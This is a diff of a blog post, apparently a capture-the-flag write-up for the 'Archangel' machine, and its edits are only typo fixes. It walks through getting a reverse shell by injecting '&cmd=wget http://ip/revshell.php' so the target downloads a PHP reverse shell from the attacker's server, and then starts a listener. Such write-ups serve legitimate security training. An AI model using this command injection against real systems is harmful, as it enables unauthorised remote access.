W-47/skills-github-pages/_posts/2023-06-27-Archangel.md

 We can actually run commands on it. so next let us try and get a reverse shell.

 # SHELL
-So we are going to get a sample php reverseshell from [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)
+So we are going to get a sample php reverse shell from [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)
-Next we are going to set up a python server on our machine.
+Next, we are going to set up a python server on our machine.
-Next we are going to run **&cmd=wget http://ip/revshell.php** We should be able to get a 200 code on our machin e.
+Next, we are going to run **&cmd=wget http://ip/revshell.php** We should be able to get a 200 code on our machine.
 ![](https://i.ibb.co/4jKLJfz/httpserver.png)

 next start up a listener on your machine